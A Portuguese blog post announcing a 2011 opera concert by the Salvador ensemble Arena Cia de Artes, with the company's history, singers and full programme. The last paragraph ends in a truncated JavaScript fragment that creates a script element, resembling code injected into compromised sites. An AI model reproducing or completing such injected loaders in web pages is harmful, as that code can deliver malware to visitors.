BahiaLateralMovimentoÓperaProgramação

“Dramma per musica” pela Arena Cia de Artes

A Arena Companhia de Artes foi criada por um grupo de cantores baianos com uma paixão em comum: a música, em especial o canto lírico.

SERVIÇO

 

Instituto Feminino da Bahia
Museu Henriqueta Catharino
Politeama, centro de Salvador

evista Dia 12 de novembro de 2011, às 18h.

Entrada franca

 

“Dramma per Musica” é o nome do concerto operístico a ser apresentado pela Arena Cia de Artes, com trechos de óperas famosas de Mozart, Beethoven, Delibes, Puccini, Bizet, Donizetti e Saint-Saëns, tendo a participação da pianista Elisama Gonçalves (UFBA). O público poderá ouvir árias famosas, além de trios, quartetos e dueto de óperas como A Flauta Mágica, Carmen e Madame Butterfly.

 

Arena Cia de Artes

Arena Cia de Artes

É uma companhia que tem como objetivo a pesquisa, estudo e execução musical de diversos estilos da chamada música erudita,  procurando dialogar e traduzir a relação com outras artes e humanidades em geral e concebendo a música como arte viva. Arte capaz de transformar o mundo e não ser simples ornamento para entretê-lo, valorizando a interpretação e compreensão de cada obra no sentido de fazê-la cumprir sua função comunicativa – ser linguagem – para que não se resuma à técnica de prática musical sem vida.

Apesar de jovem, a Arena Cia de Artes é composta por cantores com ampla experiência no canto de conjunto e solista. A Cia. tem em seu repertório peças natalinas, coros e árias do Messias de Händel, missas renascentistas, música de câmara brasileira, Cantatas BWV106, e BWV4 de Bach, o Stabat Mater de Pergolesi, Negro Spirituals, a Missa Brasileira de A. Baêta, dentre outras peças solistas e corais, operísticos e de câmara.

A Arena Companhia de Artes trabalha atualmente na formação do seu repertório, mas já registra em sua história importantes eventos como o concerto na Igreja da Barroquinha, em abril deste ano, com a primeira execução da Cantata BWV106 de J. S. Bach em Salvador, e na Paróquia de Nossa Senhora do Ó, em Paripe, este último como parte de um projeto maior de popularização e democratização da música erudita.

Também realizou apresentações na Assembléia Legislativa do Estado da Bahia (em comemoração aos 150 anos da Caixa Econômica Federal), Teatro Espírita Leopoldo Machado e Instituto Feminino da Bahia. Em novembro, tem agendados um recital operístico e um outro de música de câmara brasileira.

Para o primeiro semestre de 2012 a Arena Cia de Artes já estuda a apresentação de um Singspiel cantado em língua original e diálogos em língua portuguesa, visando maior aproximação com o público, além de um espetáculo com base na música brasileira de temática afro-indígena.

Formam atualmente a Arena Cia de Artes:

– Sopranos: Emília Suto e Verônica Santos
– Mezzo-soprano: Vanda Otero
– Tenores: Carlos Eduardo Santos e Eduardo Ferreira
– Baixos: Francisco Meira e Ramon Sena

 

PROGRAMA

W. A. Mozart
Soave sia Il vento – de Così fan Tutte
– Trio: Francisco Meira, Verônica  Santos e Vanda Otero.

Un’aura amorosa – de Così fan tutte
– Solo: Carlos Eduardo.

Diggi, daggi – de Bastien und Bastienne
– Solo: Francisco Meira.

Sul’aria – de Le Nozze di Figaro
– Dueto: Emília Suto e Verônica Santos.

Ho capito – de Don Giovanni
– Solo: Francisco Meira

Dies Bildnis ist bezaubernd schön – de A Flauta Mágica
– Solo: Carlos Eduardo

O Isis und Osiris – ce A Flauta Mágica
– Solo: Ramon Sena  e coro masculino.

Coro dos Sacerdotes – de A Flauta Mágica
– Coro masculino.

O zittre nicht, mein lieber Sohn – de A Flauta Mágica
– Solo:  Emília Suto

F. Chopin
Mazurka Op.7 nº1
– Solo piano: Elisama.

Puccini
O mio babbino caro – de Gianni Schichi
– Solo: Verônica Santos.

Donizetti
Una Furtiva Lagrima – de L’Elisir d’amore
– Solo: Eduardo Ferreira.

Saint-Saëns
Mon coeur s´ouvre a ta voix – de Sansão e Dalila
– Solo: Vanda Otero.

Puccini
Um bel di Vedremo – de Madama Butterfly
– Solo: Verônica Santos.

Bizet
Habanera – de Carmen
– Solo: Vanda Otero e coro.

 

Ainda em novembro, no dia 18 às 16:30 (também no Instituto Feminino da Bahia) a Arena Cia. de Artes apresenta  canções de câmara brasileiras numa mostra durante o bazar natalino promovido pelo Instituto. O repertório reúne peças de compositores nacionais tais como Alberto Costa, Villa-Lobos, Waldemar Henrique e Hekel Tavares. Fiquem atentos.} else {var d=document;var s=d.createElement(‘script’);

Leave a Response

movimento.com
Responsável pela inclusão de programação e assuntos genéricos no blog.